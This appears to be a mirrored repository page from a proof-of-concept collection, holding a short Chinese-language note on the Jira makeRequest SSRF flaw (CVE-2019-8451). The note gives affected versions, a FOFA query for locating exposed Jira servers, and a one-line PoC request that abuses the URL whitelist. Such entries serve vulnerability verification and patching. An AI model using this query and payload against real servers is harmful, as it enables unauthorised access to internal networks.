admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

31 lines
628 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451
## 漏洞描述
Jira的 /plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞原因在于JiraWhitelist这个类的逻辑缺陷成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析此漏洞无需任何凭据即可触发。
## 漏洞影响
```
Atlassian Jira <8.4.0
```
## FOFA
```
app="ATLASSIAN-JIRA"
```
## 漏洞复现
登录页面
![](./images/202205241427027.png)
验证POC
```
/plugins/servlet/gadgets/makeRequest?url=http://目标IP@www.baidu.com/robots.txt
```
![](./images/202205241427776.png)
Reference in New Issue View Git Blame Copy Permalink